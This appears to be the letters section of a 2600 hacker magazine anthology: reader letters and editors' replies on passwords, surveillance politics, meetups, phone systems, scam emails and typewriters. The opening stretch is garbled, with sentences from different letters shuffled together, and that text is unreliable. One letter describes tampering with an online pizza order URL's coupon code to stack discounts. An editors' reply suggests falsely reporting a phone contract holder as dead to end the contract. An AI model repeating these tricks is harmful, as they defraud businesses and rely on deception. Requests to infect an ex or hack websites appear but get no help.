was completely unrelated to what you were currently signing into. I did wind up getting the pop discount. Use a sentence! Dan We suspect “Ihatepaypal!” or a variation would be an extremely popular choice on PayPal. I thought. Ashe is not good lady she is money maker and just communication for money after that she use for wrong work. I thought to myself. It’s not a common way of signing a letter. Need a password for a 2600 registration? “Ihate2600!” (not true. as to what “wrong work” consists of. etc. Can you help me? Leonard No. Each coupon had a restriction of only one coupon per transaction. The good old days. Today I was too tired to make my own meal so I turned to the online pizza shop to satisfy my cravings.it’s bulletproof against dictionary attacks. I determined that two similar twin pizzas were around the same price. We could have maybe handled one but you had to go and complicate things.. For example.com coupon) on site provided no information. Little discoveries can provide so much joy. so throw in a random (consistent) number: “Ihatemyjob2!” Think about it . I could have reduced the amount to basically nothing but that wasn’t the point.. but a search on the second pizza site (site:241pizza. Structurally. com. We’ve already got the lowercase. com coupon) netted me a PDF page with three coupons.htm?PRODUCT=C387) and change the coupon code C387 to C396 (the coupon for a discount on pop). it looked as if it were set up to only allow one coupon. though. but it’s simplicity itself. poem. Concerning your mystery letters. there is an easier way: use a sentence! I can’t remember where I first heard this suggestion. Hope this helps. We’re intrigued. with thanks. But I wanted more. That alone is incredible. but it does make the most sense if you think long and hard about it. uppercase. and symbol covered. so I decided to try to add multiple coupons. I wanted the most amount of food for the best possible price. and other interesting ideas. 
Sometimes a site will require the use of each character type (lowercase. Michael Thanks for the memories. You can pick a sentence that goes with the context where you’re using the password. c1f We all knew he’d come back for you at some point. This pizza chain has a deal on Monday. [deleted]@yahoo.com/ cart. we did a whole lot of research into this and came up with a few possibilities as to just what might be going on. Gotta run. At that point in the day. number. Comparing prices. Each time I attempted this on the ordering form page. Wow. but this is just an example). Why someone would reference it whenever signing their name is a bit of a puzzle. and Wednesday where you can remove three dollars off any order. granted.
Dear 2600: Thanks for your website. doing the same thing but changing certain letters to numbers or symbols. with ideas ranging from using the first letter of each word in your favorite song lyric. One of them really interested me. 1970. I decided to put back in the original transaction URL for three dollars off and I noticed each time it was accepting the coupon and removing three dollars. [deleted]@hotmail. Performing a Google site search (site:pizzapizza. So in the end. Tuesday.
slot until the operator heard five dollars’ worth.” an album and song by AC/DC that somehow still sounds pretty fresh after all these years.. I received a foreign key error and terminating message that the server produced. How about a forum for programming? “Ihateprogramming!” I often use a pattern to make the first part easier to remember: Ihate<insert stuff here>!. I hear the pizza guy knocking at the door.” which is a three-dimensional structural element capable of binding DNA. symbol).
Ideas
Appeals
However. it seems like there have been a lot of articles on how to pick a password. When trying this. Through understanding them you can discover little tricks. uppercase.

One of the first things the Obama administration did was to affirm the Bush administration’s support of immunity for telcos that facilitated the spying of the Bush administration. The power is there now. it is too tempting not to use it. I believe we would be kidding ourselves to assume that Obama’s administration will not continue to use any domestic and international spying powers put forth by the Bush administration.” and you always respond with a statement to the point that the hacker mentality cannot be separated from politics. I hope you can see why I was disturbed at even the smallest intimation that you might be averting your watchful eyes or softening the application of your inquisitive intellect with regards to the new presidential administration simply because this leader flies the flag of a Democrat or because you agree with him ideologically in some areas. AND IN THE PRESENT STATE OF THE WORLD ECONOMY HE TOLD ME THAT’S ALL HE HAS TIME FOR.” if only a little bit.
Dear 2600: I am writing to say that I was somewhat disturbed by a recent episode of Off The Hook that I heard. No. And that sentiment is the surest way to keep things the way they are. more of a reshuffling of the inmates around the world. BUT AM WILLING TO PART WITH IF YOU CAN PUT ME IN TOUCH WITH SOMEONE WHO CAN HELP ME WITH MY REQUEST. I only ask that you continue your vigilance in watching this administration just as closely as you would any other. much less roll it back. which is almost more dangerous. Bpa Your points are quite sound. a listener and/or reader had commented on how you all appeared to be “gushing” following the inauguration of President Obama. Once power like that is granted to the government. Happy Hacking. So don’t mistake feelings of happiness on the very first day of this change in government as blind subservience to anything that follows.. and I sincerely hope you continue to be honest with yourselves and your readers. Abuses similar to those that occurred at Gitmo will almost undoubtedly continue. even if it’s not as much of a change as we would like. and then Emmanuel admitted to “gushing. From my first reading. This mentality of suspicion of powerful government along with your propagation of all the merits of freedom of knowledge and of being inquisitive is what defines you. Otherwise our negativity will override any points that we want to make and communicate to others. AND AM WILLING TO PAY FOR THE PRIVILEGE OF SENDING HIM A VIRUS OR TWO. this passion struck a chord with me. SINCE AFTER PROPOSING TO ME HE DECIDED THAT MAKING JEWELRY AND MONEY WERE FAR MORE IMPORTANT TO HIM THAN I WAS. AS WELL AS DISABLING HIS WEBSITE. There are always comments on the radio program and in the magazine from people complaining about you being “political. But it’s quite clearly a change from the previous one. the reason I was disturbed to hear this is because when one is “gushing” over someone or something. 
this is the very last thing I would expect of you at 2600. and all future government administrations will have access to it. quite frankly. a visceral chord as well as an intellectual one that continues to resonate. fearless in the face of mainstream opinion or other powerful forces. I’M WILLING TO PAY A COUPLE OF HUNDRED DOLLARS I CAN ILL AFFORD AT THIS TIME. The reason this disturbed me is not because I disagree with many of Obama’s policies and find them antithetical to freedom and was therefore perturbed to hear your support. It is the independent and free thinkers such as yourselves that keep the door open for free and honest questioning and debate. nor am I surprised at their gross dereliction of their investigative journalistic duties. because at least with Gitmo. there was a symbol. Thank you for being who you are. Dear 2600: HAVING BEEN UNCEREMONIOUSLY DUMPED. that person has a tendency to ignore or be in denial about any faults of that person or thing. Though all of mainstream media has been shamefully activist in favor of Barack Obama. I am not surprised at the love affair the mainstream media has with this administration. I’M NOT A COP/CYBER SURVEILLANCE
The “place where there is no darkness” can never exist without the constant and honest vigilance of the free. We can occasionally be happy without giving up our concerns. many of whom you will not agree with ideologically. or that they will not implement their own laws and programs that further infringe on the privacy and freedom of the American public. We all know that there are going to be problems down the road and many things to disagree with in the new administration. But every now and then it’s important to step away from the eternal vigilance as individuals for the sake of sanity. In this episode. regardless of whether they claim to be on your side or whether you agree with some of their ideologies. And so. I would be surprised and superbly disappointed if you at 2600 abandoned the very core of who you are and did the same. a central point of human rights abuses that the public could focus on. and that we must remain vigilant over our freedoms against the infringement of those in power. The closing of Gitmo was a publicity farce. To not acknowledge this is to imply that real change isn’t realistically possible. AND MAYBE ONE DAY WHEN THINGS GET BETTER HE’LL GET BACK TO ME. simply distributed without a symbolic focal point for the indignant. I WOULD LIKE TO TEACH MY EX A LESSON HE SOON WON’T FORGET. However.. This culture of curiosity of all things and inquisitiveness into gadgets and government alike has had such a great influence on me.

All that said. This could result in other side effects but it has been known to get the phone disconnected quickly with no penalty.. black text for the article titles. It’s just a question of reaching them. they have been printed over black and white photos rather than over white as in all the previous issues that I have read. I love the many articles and hope to be able to order some back issues soon. I thought it sounded right along your lines. So be aware of this. you’ll be able to apply this hacker mindset to almost any situation and. I was hoping this was something you could help me with. So I would like to ask you if you could help me to grow in that community otherwise or help me promote the 2600 in my country. Dear 2600: My name is Tuyishime Aimable. and fountain-style pens with darker ink.
ANYTHING . it’s actually not just about the technology in the end. I was wondering if there was any way to get out of a Sprint contract. Oh yeah. I find it useful to annotate my copies of 2600 by writing little summaries of each article in the space beside the titles in the TOC and/or by putting stars next to the particularly amazing and useful articles. They’re open
Building the Community
find other like-minded individuals. happy (belated) 25th and keep the awesomesauce flowing! 27B/6 We suggest using bright red stick-on stars to mark articles. and always maintain a level of curiosity. These are available at most office supply stores. every country is different with regards to rules. no matter where you are.something you can help with hopefully. You could also loan out your phone for the remaining months to someone who is willing to pay the monthly rate. Just because you’re far away from us doesn’t mean that you can’t start running your own meetings or events.JUST A GIRL WHO’S HAD HER HEART BROKEN.human or machine . who will share your curiosity and passion. etc.. He’s walking away from quite a catch. Since the fateful 25:3 revision. This is another reassuring fact. you don’t have to live in the Western world or even have access to high tech in order to be part of the hacker community or to spread the enthusiasm of the hacker culture. If you learn to think like a hacker. Since that issue. You will find the hacker community all around you. Dear 2600: I enjoyed the tables of contents more in their pre-25:3 format. It’s about the thought process. But I have a question . There are always other people. warlock There are absolutely no requirements of this sort to attend one of our meetings. as a last ditch attempt. This is true of any authority figure. and how individual thinkers are dealt with. So our advice is to use this distance as an opportunity to start something fresh and to be a real pioneer in your country. keep reading a lot. My question is am I able to attend the meeting in Dublin and what do I bring if I am allowed? Can you tell me a little about what we do at the meetings and what I need? What do I need to bring (laptop. Of course. you can also cut back your plan to the bare minimum so that the amount you spend over the next few months will be less than the penalty.
Your purchase agreement does not allow you to mark issues with a pen. While technology is often at the heart of it all. As hackers are almost always heavily involved in freedom of speech issues. Dear 2600: Hiya I’m 15 and love technology and love to talk about it. The problem is that I can’t attend any meeting or any other event because I live very far from you. If that fails. in so doing. Or. the reaction against them can sometimes be a bit heavy handed. though. and shiny happy white space beneath. between. it will make them give you various incentives to stay and these will at least reduce the amount you’re spending each month. Aimable Contrary to popular belief. what is tolerated. If we look back at the really early days in our own country.)? Thanks. and behind. of course.and by constantly experimenting and sharing your findings. I live in Rwanda. I have considered several solutions: white-out. AND IS TRYING TO MAKE THE PAIN OF HER SITUATION LESS UNBEARABLE. where you are and what you have access to will become secondary. Dear 2600: I am a new hacker reader and am enjoying your magazine. Angelique We can’t imagine what this guy was thinking. I write to humbly request that you return to the old format. These all seem kinda inelegant. So make sure you’re familiar with what you’re up against and what you’re willing to fight for. While this won’t get you out of the contract. I like what you are doing. more difficult to write with a pen on a black or gray background. money. By questioning everything . hackers did just fine playing with rotary dial phones and glorified electric typewriters. no question there. Stuck in a contract and wanting an iPhone dawn The best way to deal with this is to make them believe you’re about to change carriers. I joined the 2600 community a few months ago. It is. I am carrying a Treo Centro on the Sprint network right now and the contract is not up until the end of the year. silver markers. 
with a small picture in the upper right of the TOC. you can also report that the person (you) whose name the phone is in is no longer living.

I don’t know why I didn’t see that sooner (hint: I’m a dolt). We welcome people of all levels of expertise.) Dear 2600: I just got the guidelines auto-reply. If I do this.com. there will always be people who can’t make it to the meeting on a particular day but the first Friday rule has been in effect for over 20 years and it’s reached the stage where it’s factored into people’s schedules before they accept a job offer or complete their class schedule. I no longer hack hardware/code (software engineer now) but enjoy attending mainly because the people are so interesting at these meeting. help those who ask questions. in addition. Palo Alto and Mountain View are the homes of many startups as well as Google. Obviously. so we try to keep it simple by only listing the “first Friday of the month” ones. Lowery Our auto-reply also explains the rationale behind having the meetings on the first Friday of each month. Dear 2600: I recently moved to Amsterdam and was astonished that there is currently no 2600 meeting here. Dear 2600: How can I find a hacker group or convention in South Florida? Joel We’re not aware of any hacker conferences taking place in that part of the country and none of the four 2600 meetings in Florida are in the southern part of the state. might we suggest a free Marketplace ad? You would need to be a subscriber or at least know someone who’s a subscriber who could submit the ad. I’m ready to publicize it. and be ready to explain what we’re all about to those who might not get it right away. we greatly prefer them to those people who believe they know everything. I live in Bakersfield. (In fact. We certainly hope something gets started as a result of your inquiry. about a 60 minute drive from where I plan on setting up the meeting (Mountain View or Palo Alto). California and the closest 2600 meeting is over 100 miles away in Los Angeles. (At least for a few people it’s gotten to that point. 
and I feel that such a meeting in one of these nearby locations would do quite well to bring people together. Anything that helps to build the community is a good thing. Furthermore. This is why it’s so important to understand what the meetings are really about and to invite people from all circles to join in and make them even better. Dear 2600: First off. would that alternative Friday be acceptable in your opinion? Lowery Having secondary meetings in other places is a great idea.) I’ve been attending 2600 meetings in Ottawa and Toronto for quite a few years now. your idea is still a good one and there are already numerous meetings that have “unofficial” get-togethers in either the same or a different location. What we suggest is that you spread the word at the official meetings and see if you can get some enthusiasm for the alternative ones. However. but I was considering setting it up for the third Friday instead of the first of each month. Anyone interested should contact me through the form on the website: bakersfield2600. so I’m considering organizing meetings here in Bakersfield if there’s enough interest locally.webs. I wanted to congratulate you for making such a great publication available to the public for over 26 years. avoid developing cliques. Jason For those interested in setting up more meetings and reaching out to the 2600 readership in this manner. We hope you find them interesting. It just gets really complicated if we have to keep track of all of these meetings.
to all ages and there’s no admission fee of any type. the Dublin crowd is a good one. We imagine there are lots of potential areas for meetings but it’s always a challenge to reach out to people when you have yet to meet them. and might put an end to my plans (which isn’t necessarily a bad thing).) All we ask is that you come with an open mind. offer people who can’t get to a meeting in a major city an opportunity to meet other hackers. There will always be those who imagine the meetings exist for the purpose of obtaining illegal information or devices and you may even encounter attendees who believe this and who try to subvert the image of hackers into the mass media definition. peter It’s hard to imagine why there would be no interest. including any security guards who may work in the space you’re meeting in. including those who believe they know absolutely nothing. while at the same time give those who wouldn’t want to drive into the cities (and deal with parking) or deal with the train schedules (which end before most meetings end). How would I go about starting a meeting here? (I’m not sure there would be any interest. Some meetings have presentations but most are simply gatherings where people talk to a variety of individuals who show up. particularly in a city as individualistic
Having meetings on the same day of the month makes it easy to keep track of and there’s never a question of which day is 2600 Meeting Day. there are two fantastic meetings already in San Jose and San Francisco. That lays out some excellent points. I don’t want to cut into them and make people choose. However. Dear 2600: I am working on starting a 2600 meeting in my local area (Silicon Valley). We understand that once a month often isn’t enough but it’s also good to get to other places and.

how the scaling worked when it got on Slashdot. if there are features that aren’t working properly or things our site should be doing that it isn’t. Canada. Within the NANP system. I know the difference between a hacker and a cracker. It takes a lot of time and determination but sir. The concept of a page that shows a collage of websites a user has visited by digging through their browser’s history is fascinating. We’ve had articles on this subject in the past but are certainly open to printing new ones with updates and additional information. like most other people.S. The topic would be a guide to the North American phone system for newbies. Dear 2600: Sir. com (namely how the browser history sniffing worked. However.” That’s just the (somewhat outdated) method of indicating that you’re dialing outside your area code or making a long distance call. Sir. Dear 2600: I’d like to write about creating web2. Dear 2600: I wanted to add to the advice you wrote in response to dawn’s letter about how to try and get out of her cell phone contract. Having the magazine available usually helps and it’s possible that might be a challenge if no local bookstores are willing to carry it. Dear 2600: I’d like to suggest a topic for an article. Please give attention to my request. We actually have a number of people working to overhaul our site and we’re confident we’ll get there one day.
and creative as Amsterdam. I don’t know from where to start. please tell me from where to start and which courses I should take. My only motivation for doing this is to make the website more reliable. you’re not dialing a country code every time you precede a domestic number with a “one. and easy to use for both the admins and the users. For example. I surf a lot on the net to find the beginning but failed to find a real one. We’re not at all discounting your generous offer but it’s important to realize that such things are more complicated than appear at first glance. and would start by describing the dial plan. My sister recently wanted to switch carriers but had eight or so months left on her contract. That’s really all I know. which includes the U. so she called her carrier to find out what they could do for her. Until then. Someone with more knowledge. and frightening. Those can be considered our three essential ingredients. Any thought on this would be appreciated. The “one” is actually the “country code” where the “country” in question is the NANP (North American Numbering Plan). It would be a boon to everyone who isn’t already a phone phreak. creative. Tech. dialing 011 indicates an international number. I will be very thankful to you. degree. Would something about this be of interest to you? Holden Most certainly. What you do with that knowledge and ability later on is a totally different story. I thought the “one” you dialed before a long distance number was the “long distance access code. I am sorry because I am going to ask you the same question which I think you hear a lot from the basic user: that is. It’s filled with all sorts of fascinating details and trivia. and a bit about the potential privacy concerns). You obviously need to have an interest in the stuff you’re asking questions about. They are distinguished by the familiar three-digit area codes (called NPAs). Travis H. 
Dear 2600: I am wondering if the staff of 2600 would be interested in having a website designed and implemented using a content management system such as Joomla. It’s a state of mind and you get there by experimenting and asking a whole lot of questions. Being a hacker means to be someone with a strong desire to learn and to innovate. Don’t buy into the hype of hacker versus cracker and the silly colored hat designations. Prateek We get so many requests like this and it’s important to make it clear that hacking isn’t something that is taught like a class.0collage. I am a student and currently pursuing my B. the only reason a meeting isn’t taking place in a major city is simply because nobody has yet taken the time to put one together.. Thanks and keep up the great work! Zach Designing and implementing a site is a single step in a long process as there are countless things that can and will go wrong down the road. The phone network is what inspired a great many hackers to start exploring in the first place. and some Caribbean countries. I would be willing to do all the work for free. accessible. You suggested that she could downgrade her plan. but I wanted to let your readers know just how far you can downgrade. how I can be a hacker. The CSR she spoke with informed her that. I am from India. You need to not be afraid to step out of the rigid confines of rules and see what happens under different conditions. Oftentimes though. and most of what you explain above is accurate. I know that I can’t be hacker just in a night. rather than pay
Ideas on Spreading Knowledge
New Information
pick it up and run from there. we would like to focus our attention on that in the more immediate future. In short. this is mistaken. This is how you dial countries outside the NANP. how I can be a hacker.

He contacted the company about it. K-Max says he only wanted to expose a security flaw in the Telefonica system. ++divide_by_zero It most definitely will be and we’ll be keeping an eye on this. The documentary The Obama Deception. That led to lots of discussions about security. Orkut. It just goes to show that there are interesting hacker cases going on all over the world and we would do well to pay attention to them at least as much as we focus on what’s happening close to home. and whatnot. she could downgrade her plan to an obscenely low-priced (and massively neutered) $10 a month plan instead for the remainder of the contract period. I doubt anyone is pressing charges on the company.
the early termination fee.” She was able to effectively pay only $80 for the remainder of her contract period rather than the $150 it was going to cost her to cancel early. And Telefonica is also not very popular because of some faults on their Internet service. Thanks for letting us know about this. This letter sounds like a shameless plug. whatever field they may be in. Dear 2600: First off: goodness! Did you really send that fellow every copy of 2600? That would rock! I am 14 years old and a budding hacker/ phreak. The country is right now in the midst of a controversy because of a proposed law to typify digital crimes. katkat Conspiracy theories are always interesting and fun to watch. most conspiracy theories are part of the conspiracy themselves. as long as you question them as much as whatever it is they’re questioning. I will do it for just the gratification of helping others. not just a technical one. and others. I always download your radio show and have purchased a copy of your anthology. theorizes that Obama won because he was seen as most acceptable to the public and the people who apparently always run the government. this information can help anyone who finds themselves looking at the green grass on the other side of the fence.who have access to things we can only dream about . She would just have to be willing to give up her current number and get a new one with her new carrier if she still wanted to switch. Dear 2600: I was not really sure which email address to send this to but I wanted to get some information on submitting photos to the magazine. DSLAMs. none of this “teach me to hack” crap. It’s available on YouTube. plant.” which means one to four years of arrest. This is a great example of how people within certain organizations .
try browsing The Reality Zone (http://realityzone. The police already have gone to his house. dmchale Dear 2600: Since 2600 seems to be a sociopolitical magazine. Brad We look forward to receiving your submissions. but in some serious trouble. No! I have decided to develop myself through reading and exploring with specific questions and answers. Thanks for helping to preserve the hacker spirit. Good stuff!
All Sorts of Questions
It will be interesting to see what happens. He will be indicted for “distribution of secrets. I might just be a phreak but I believe some other people would like to see everything from the ancient equipment to the latest and greatest. MDF. since the current number would still be “active. but even I think some of the ideas in the documentaries and the site sound too surreal. too.” (Is he a “hacker” or “digital prankster” . Thanks for your time and consideration and. If you are interested in these types of things. and also put up a website for anyone to verify this security flaw. I still have to check the claims. etc. I get to see this stuff every day. Apparently. they also want to indict him for his previous acts. and other ideas regarding the Internet. I wanted to send you and your readers this information. It’s available on Google Video. He found a way to access private data from customers of the Telefonica phone
company through the Internet. 2001. Happy watching (and reading).can make our world so much more interesting simply by sharing information. Flickr. and taken some of his equipment. armed with guns. and she’s been happy with her new hardware and service on her new carrier ever since.who knows?) Some time ago. Now the company is accusing him of data theft. the organization. When people tried to access sites such as Google. com). Blogger. But. he presented a fake page saying the organization considered the requested page to be an inappropriate website. With luck. as always. He hit the news again in the first Campus Party last year by redirecting the traffic of a LAN to his laptop. (We’re waiting for the documentary on that. Now K-Max is in the news again. The documentary ZERO: An Investigation Into 9/11 directed by Franco Fracassi and Francesco Trento has some interesting claims about what happened on September 11. I would be more than happy to write up a small article on the piece of equipment that is in the photo as well.

sure enough. in theory. were we to respond to this person via return email. So please let me know if you can assist me with the order. and somehow the only way to make the order go through would be to involve bank transfers to third parties once their payment to us had been received. where can I get it? Or where should I start? Apple Freak A good place to start is by defining your terms. But. I really appreciate everything you folks there at 2600 do for me and everyone else. These things take time and you will almost certainly not get it right from the start. Or perhaps
break even. However. You need to gauge your readership and figure out where your content is coming from and how much of it you can manage for each issue. Naturally. yes. there are thousands of almost identically worded letters floating around on the net. then you have a much better chance of evolving into a regular publication that might. We suspect the authorities already have. printing our reply in a magazine pretty much defuses the whole thing right away. If you can accept that and work it out so that in the worst case scenario you don’t lose a fortune. and material into this project and you may never wind up in the black. Dear 2600: PLEASE I NEED TO KNOW IF YOU HAVE TO CALL TO CUBA. And please do not forget to include your web page in your replying back to my mail. Dear 2600: I want to place an order on your store and I would like to know if you ship to Australia. We would be enticed by having the amount they pay to us be substantially more than what we needed to transfer to the third party. that letter I just wrote did feel somewhat like conquering a mountain! Or taking down “the man!” Hooray! Leone263 It sounds like you’re on the right path. still work. Wow. visit a corner grocery that sells phone cards. taking pictures. I will be very glad if you treat this email with good concern. The best advice we can offer you is to let your zine grow into a rhythm. I was thinking of starting my own small quarterly magazine and was wondering if you had any advice. Nicolas Why on earth do you think we’re the people to ask about this? Go shop around. The important thing is to realize that you will be putting effort. Dear 2600: First of all. or ask random people on the street. money. Random ballyhoo: how many people make up the staff there? Just curious. (That in itself is a bit strange since someone should already know this if they’re interested in ordering something from us.
their payment to us would turn out to be fraudulent and any money we sent out would be lost along with anything we sent them in the mail. What’s the scam? Well. We have a handful of people who devote their entire lives to our organization (not counting all of the lunatics who do this without our knowledge). In answer to your query. My method of payment will be credit card. no matter what. we do ship to Australia. You also might want to find a way to unstick your caps lock key. I have found the hacker community welcoming and informative. The latter would be a frighteningly large number if we ever tried to calculate it. Voice over IP is one category that has almost infinite worlds of possibility. participate in online forums where people actually discuss this stuff. etc. Most new zines either overdo it and get burned out (or lose a ton of money) or don’t put in enough effort and wind up never really going anywhere. we would undoubtedly get a followup asking for a list of products we sell. I recently subscribed to 2600 and I love it. lending expertise on a variety of technical and non-technical fronts.
Second (or third) off: Thanks. Thanks! Michael We assume you’re talking about starting an actual printed magazine as opposed to something online. I will await your prompt response as soon as you receive this mail. having that printed object in front of you is an achievement you will be proud of for many years to come.) They would then send an email ordering a large number of items. if only because it requires a certain commitment that oftentimes doesn’t exist in the glut of electronic prose. Thanks. ask Google. and then there are people who contribute what they can. That’s why it’s always better to try and fail rather than avoid failing by not trying. Incidentally. it depends on what the definition of “staff” is. Frank Moore This one almost got us but it actually is part of a scam. which is why they live in constant fear over what we might do next. Thanks for writing. first of all.” Needless to say. GOOD RATE. there are exceptions on both ends of the spectrum but print is in our blood so we’re naturally going to feel its magic. Good luck. Going print is a lot harder and has many challenges but we find the printed word is more enduring. It’s hard to imagine people falling for such schemes but it happens all the time and the fact that even for a moment we thought this was a real letter indicates that these con jobs can. There is no one phone system obviously but there are so many different aspects to phone networks today that it’s hard to sum it all up with one label. whether it be through writing. The “good concern” is what seemed a little fishy so we checked online and. most likely an additional amount for our “trouble. Dear 2600: If I want to get more information on the phone systems nowadays.

The email address is payphones@2600. 19 Jul 2009 11:06:51 -0400 Subject: OperationUtopia Just got this e-mail & thought you might be interested. A proactive approach must be taken. who some have called the secret society. if not to support the secret society. & if enough people play the game they will have a workforce unparalleled in recent history. We can say almost certainly that any phones submitted to us in recent memory would be of a very different style than those in use back in the 1970s. Of course. operationutopia@hotmail. Pass it on or check them out-you may not believe what they have going on. Its about a betting site and they have in every betting house a TVs on them are going recorded dog bets 1-6 my question is can we hack them to see whats next bet on dogs there is a lot of money to win can you answer me please bye :) Arnel You want us to somehow help you hack dog betting? Other than fixing the races (let’s hope you’re talking about races). .THE HACKER DIGEST . I ran a search for e-mail addresses associated with 2600 articles. on some sort of online forum. don’t worry about size (however. Every phone everywhere is a portal. Dear 2600: I have read on your site very nice things but I can you help me please with some hacking.VOLUME 26
you’re interested in private networks (PBXs). or should I upload them to a specific place? I don’t want to blow up any mailboxes. ----. Dear 2600: FYI in case you’ve not gotten this yet. and please provide as much info as you can on the phone being submitted: where it was found. we will hear it from them. And don’t forget the method so many of us used to figure it all out . the more traditional long distance phone companies. I have heard they communicate via encryptions based on the non triuial zeros of the riemann hypothesis. For everyone else.hands-on access. controlled public manipulations through cyberwarfare & cyberattacks. no matter who the real terrorists are. For them to have remained anonymous for so long is remarkable from what I hear they have done & who is with them.com. As well. etc. Forward all this info to as many hackers as possible. images that are too small won’t print well). it might be difficult to find actual photos of payphones with much attention to detail. This group. Thank you for your time. From the outside oputopia looks like a game whose solution is figuring out what the secret society really is. which media outlets claim came from North Korean sympathizers are real is a moot point.not for this issue and not even for the day that this was received. Whether things like the recent DoS attacks on the Pentagon. Dear 2600: I just came back from Mauritius (very small island in the Indian ocean) and took pictures of two different payphones for you. should I include a caption with each? Scott Brown Since one of your pictures has been printed. reactionary defenses from these types of threats to net neutrality & freedom on the net will be to late. Do you have any idea who/what this is? ---------. Heavy stuff. what precisely do you think we can do? We’d like to say this is the most unclear letter we’ve ever gotten but it wouldn’t be true .
241
. but you’ve thoroughly spooked us out.End forwarded message ----Sai No. Steven As that was a fairly chaotic period in the country’s history. or by meeting other like-minded people at conferences or 2600 meetings. exploring your local bookshop or library is another great way to learn. whether that be in the letters section here. If there is no independent arbitration & things like this go unchecked networks will become locked down as a response to this cyberterrorism. we trust you found the answer. when I send the pics. any interesting facts.. Dear 2600: In the recently published The Best of 2600 book. there is a mention of a 1991 video covering Dutch hackers accessing military computer systems in the United States. How ever did they find out our secret plans? Dear 2600: Would you have any photographs or information on the payphones that would have been in use during 1970-1975 in Vietnam? I am researching props for a production of Miss Saigon and would love to be as historically accurate as possible. They were taken with a 12MP SLR so they are five megabytes each. We seem to have become the clearinghouse for the dazed and confused. Anyway get word to as many hackers as possible.. Should I email them together or separately. We’ll keep you in the loop.Forwarded message ---------Sent: Sun. You can get a lot of info just by asking. an independent non-national group of hackers has sprung up.. is gearing up to launch a global alternate reality game where everyone who comes into contact with them will be working on a project called Operation Utopia. at least to investigate them & question their motives.com is a contact point. our readers are a tremendous resource so if there is an answer to your question. Also. how the switches themselves are wired together. Is this video still available? iphelix That video hasn’t been available for some time but you can expect it to rear its head as we digitize some of our older material. However.Due to the threat of gov. 
or maybe just some history on how it all used to be. In actuality it is distributive hacking. If these guys are for real it will change everything.

why should I participate in the ongoing technological charade. give me one good reason why I should use a wireless anything? Second. an old fashioned typewriter has just the right amount of technology. But I also draw. To say that typing on it was a humbling experience would be a severe understatement. I also would like this clarified before I spend my valuable time writing something in a format your magazine may consider obsolete. Sure I hack. First. I own a Dell laptop running XP and an older desktop running Win 98SE. I am retired after 30 years of teaching. My father was career USAF and reached full colonel. There are also security concerns if proper precautions aren’t taken with regard to protecting content. But in the case of wireless devices that transmit. and text. I value tangible things much more than I value seeing information on a screen. never has to be restarted. I don’t have to worry about draining power and can pick up right where I left off. It has an infinite amount of storage space because I can always purchase a new box of paper. computers. and travel. Do you think that you can hack this site? Cause they’re always proud that they’re well protected and back up frequently. but it might not do me any good in getting it printed in the mag. Dear 2600: I was banned from this site just because the admin got the bribe from one member and when I questioned him why he banned good members without giving notice and keep the bastard just because they kissed his ass and bribe him with gift card money. he banned me without notice too and deleted my thread to erase the evidence. We weren’t particularly happy about it. The operating system never needs to be upgraded and I don’t need to worry about registering it with the company I bought it from. write. we’ll do whatever it takes to include it. I cater to the desire to see and touch real things. the health effects are still somewhat unknown. this “letter” was really an email to 2600. First. 
just like when Emmanuel Goldstein states that the printed word is still the most valuable form of communication. based on what I read in 2600 every quarter. we will print it. In other words. or for that matter. The desktop is run off-line and my laptop is used almost exclusively for email. I’ve read your magazine off and on for years. When was the last time any of us sent or received a real letter? It’s been too long. As a final note. Julie Let’s tackle your first question first. a letter can be two things: something written out by hand or something that is typed up. every other charade that Americans suffer from our government? Thanks for publishing 2600. Now to your second question. then sent through the mail. We regularly transcribe typed and handwritten letters and articles (the only way people in prison can communicate) and in the past we’ve even transcribed articles that were spoken into our answering machine. Phones. Don’t get so engrossed in staring at screens that words on paper don’t mean anything to you. And when I walk away from typing. I have no husband and no children.VOLUME 26
Dear 2600: I am a 53-year-old woman and only child. My typewriter never gets viruses. play video games.THE HACKER DIGEST . Write a note to your buddies congratulating them on a good business meeting! Write your girlfriend and thank her for last weekend! Write to an incarcerated 2600 reader! Put down that Blackberry and pick up a pen! For me. I live in my parents’ home. The point is that if it’s something our readers will appreciate. I know you guys would gush over a real written letter. I would like to know if you actually accept letters. We have no comment at this time. Being creative by nature. Dear 2600: I have an interesting issue regarding letter submissions. which I inherited. We can’t be creative as hackers if we don’t understand the technology that got us to where we are today. but it needed to be done. prompts me to ask the following questions. Good luck to all in reconnecting with your creative side. but some people may be confused about this terminology. radios all can be used with more flexibility when there are no wires involved. printed out. I’m not going to write or type a real letter until I know how 2600 will print it in the magazine. My question is this: What if someone were to write you a letter by hand or type it up and send it through the mail and you wanted to print it in the magazine? Would someone at the office type the letter up on the computer? What if it was a lengthy letter? I think clarifying this would satisfy the dwindling number of us who still value this timeless form of communication. Sometimes wireless things are more convenient. Of course you accept emails. Thanks again for a great magazine! sc0ut If the letter or article is interesting and informative. You can certainly survive just fine without using wireless technology if you so choose.
242
. mostly because these devices haven’t been around that long. I recently purchased a fully restored typewriter from the 1930s from an online store. It gives me a feeling of nostalgia and excitement that I can only compare to receiving the latest issue of 2600 in the mailbox. and never crashes. For me. Find me a computer that still works after almost 80 years. Both parents are deceased. since it’s a fact that extraterrestrials have visited Earth on countless occasions and that the United States is in possession of a vast amount of advanced extraterrestrial technology. That. and being an Air Force brat.

All of our security systems have a computer/ network component. Dear 2600: Why 2600 don’t have meeting in Malaysia? Fiez Just a guess but probably because nobody in Malaysia set one up. sigflup Finding a manual online for this particular model or simply trading information with other people who have access to this machine shouldn’t be too hard. Dear 2600: I have been in the electronic security industry since the early 1990s. If we label the column of nine buttons 0-1-2-3-4-5-6-7-8. you can press 0-3-1-2-0 to get into a menu. the RAID array. My name is Ray. and helping keep us out of the camps.000 to $40. This is years in many localities. You can press up and down to select between these and press 3 or “select” once you have one that you want. you advertise events for ToorCamp and HAR2009.” In the back of the mag. in the Marketplace.
